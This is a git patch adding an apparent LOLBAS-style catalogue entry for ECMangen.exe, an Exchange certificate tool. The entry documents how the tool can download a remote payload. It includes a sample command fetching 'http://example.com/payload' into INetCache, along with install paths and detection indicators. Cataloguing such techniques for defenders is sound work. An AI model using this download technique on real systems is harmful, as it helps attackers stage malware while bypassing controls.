From 5b17be1bed93908f920457efc0da48decaf9de5b Mon Sep 17 00:00:00 2001
From: Avihay Eldad <46644022+avihayeldad@users.noreply.github.com>
Date: Tue, 30 Apr 2024 14:14:44 +0300
Subject: [PATCH] Add ECMangen.yml

---
 yml/OtherMSBinaries/ECMangen.yml | 32 ++++++++++++++++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 yml/OtherMSBinaries/ECMangen.yml

diff --git a/yml/OtherMSBinaries/ECMangen.yml b/yml/OtherMSBinaries/ECMangen.yml
new file mode 100644
index 0000000..b5752ec
--- /dev/null
+++ b/yml/OtherMSBinaries/ECMangen.yml
@@ -0,0 +1,32 @@
+---
+Name: ECMangen.exe
+Description: Command-line tool for managing certificates in Microsoft Exchange Server.
+Author: Avihay Eldad
+Created: 2024-04-30
+Commands:
+  - Command: ECMangen.exe http://example.com/payload
+    Description: Downloads payload from remote server
+    Usecase: It will download a remote payload and place it in INetCache
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows
+    Tags:
+      - Download: INetCache
+Full_Path:
+  - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Bin\ECMangen.exe
+  - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Bin\x64\ECMangen.exe
+  - Path: C:\Program Files\Microsoft\Exchange Server\V12\Bin\ECMangen.exe
+  - Path: C:\Program Files\Microsoft\Exchange Server\V13\Bin\ECMangen.exe
+  - Path: C:\Program Files\Microsoft\Exchange Server\V14\Bin\ECMangen.exe
+  - Path: C:\Program Files\Microsoft\Exchange Server\V15\Bin\ECMangen.exe
+  - Path: C:\Program Files\Microsoft\Exchange Server\Bin\ECMangen.exe
+  - Path: C:\Program Files\Microsoft\Exchange Server\ClientAccess\Bin\ECMangen.exe
+  - Path: C:\ExchangeServer\Bin\ECMangen.exe
+Detection:
+  - IOC: URL on a ECMangen command line
+  - IOC: ECMangen making unexpected network connections or DNS requests
+Acknowledgement:
+  - Person: Avihay Eldad
+    Handle: '@AvihayEldad'
+    
\ No newline at end of file